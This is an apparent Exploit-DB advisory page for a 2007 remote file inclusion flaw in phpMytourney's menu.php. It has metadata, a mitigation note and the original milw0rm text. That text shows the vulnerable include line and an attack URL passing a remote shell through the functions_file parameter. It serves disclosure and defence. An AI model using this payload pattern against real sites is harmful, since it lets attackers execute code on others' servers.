phpMytourney (functions_file) Remote File Inclusion Vulnerability

vendor:

phpMytourney

by:

S.W.A.T.

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpMytourney

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Not specified

2007

phpMytourney (functions_file) Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include a remote file through the 'functions_file' parameter in the 'menu.php' script. This can lead to remote code execution or other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before including files. Additionally, keeping the software up to date with the latest patches and security fixes is crucial.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  phpMytourney (functions_file) Remote File Inclusion Vulnerability
# Author  :  S.W.A.T.
# Contact :  S.W.4.T@HackerMail.com
# S.Page  :  http://script.vanta.ru/download.php?id=1178&clas=0
# $$      :  Free
# Site    :  Http://www.XmorS-Security.CoM - Http://www.xmors.com - Http://www.xmors.net
*******************************************************************************
Vuln Code:

include($functions_file);

[[Remote]]]

http://[target]/[path]/menu.php?functions_file=[SHELL]

"""""""""""""""""""""

# I Love XmorsTEAM
# We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T.
# Iranian Hackers & Security TEAM
# Xmors Digital Network Hacking & Security Team

# milw0rm.com [2007-09-06]